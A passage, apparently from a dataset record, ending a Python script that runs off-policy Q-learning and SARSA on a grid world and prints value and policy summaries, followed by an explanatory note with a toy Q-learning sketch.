= 0\n self.current_loc = self.start\n s, l = self.start\n while l != (0,0):\n loc, s, l, qstar = self.step()\n print(f\"from {loc} go {s} to {l} - Q* = {qstar:0.2f}\")\n self.p()\n def print_Q_summary(self):\n self.mode = OFF_POLICY\n self.epsilon = 0\n print(\"Q* Summary: \")\n for row in range(self.rows):\n for col in range(self.columns):\n s = f\"Q*({(row, col)}) => \"\n s += f\"Up: {self.grid[row, col].values[UP]:0.2f}, \"\n s += f\"Right: {self.grid[row, col].values[RIGHT]:0.2f}, \"\n s += f\"Down: {self.grid[row, col].values[DOWN]:0.2f}, \"\n s += f\"Left: {self.grid[row, col].values[LEFT]:0.2f}\"\n print(s)\n def print_V_summary(self):\n self.mode = OFF_POLICY\n self.epsilon = 0\n print(\"V* Summary: \")\n vals = np.empty((self.rows, self.columns))\n directions = np.empty((self.rows, self.columns),dtype=str)\n for row in range(self.rows): \n for col in range(self.columns):\n direction = self.grid[row, col].get_max_direction()[0]\n value = self.grid[row, col].get_max_value()\n s = f\"V*({(row, col)}) => {self.direction_string(direction)} = {value:0.2f}\"\n vals[row][col] = f\"{value:0.2f}\"\n directions[row][col] = self.direction_string(direction)\n # print(s)\n print(vals)\n print(directions)\n def direction_string(self, direction):\n if direction == UP:\n return \"Up\"\n elif direction == RIGHT:\n return \"Right\"\n elif direction == DOWN:\n return \"Down\"\n elif direction == LEFT:\n return \"Left\"\n else:\n return \"Unknown Direction\"\nq = RL(mode=OFF_POLICY, epochs=20000)\nq.learn()\nq.print_result()\nq.print_Q_summary()\nq.print_V_summary()\n\nq = RL(mode=SARSA, epochs=200000, epsilon=0.1)\nq.learn()\nq.print_result()\nq.print_Q_summary()\nq.print_V_summary()\n\n\n\n\n\n"
}
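Note: at the core of qlearning.py above is the tabular off-policy update Q(s,a) <- Q(s,a) + lr*(r + gamma*max_a' Q(s',a') - Q(s,a)), driven by an epsilon-greedy behavior policy. The self-contained sketch below shows just that update on a toy chain environment; the chain, rewards, and hyperparameters are illustrative assumptions, not the script's 4x5 grid:

```python
import numpy as np

n_states, n_actions = 5, 2                       # toy chain: states 0..4, goal at 4
Q = np.zeros((n_states, n_actions))
lr, gamma, eps = 0.5, 0.9, 0.2
rng = np.random.default_rng(0)

s = 0
for _ in range(2000):
    # epsilon-greedy behavior policy
    a = rng.integers(n_actions) if rng.random() < eps else int(Q[s].argmax())
    s2 = min(s + 1, n_states - 1) if a == 1 else max(s - 1, 0)
    r = 10.0 if s2 == n_states - 1 else -1.0
    # off-policy target uses the greedy value of the next state
    Q[s, a] += lr * (r + gamma * Q[s2].max() - Q[s, a])
    s = 0 if s2 == n_states - 1 else s2          # restart the episode at the goal
print(Q.round(2))
```

Because the target always takes the greedy max over the next state, the learned Q approximates the optimal values regardless of the exploratory actions actually taken, which is what distinguishes it from the SARSA variant in the script.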
] | 5 |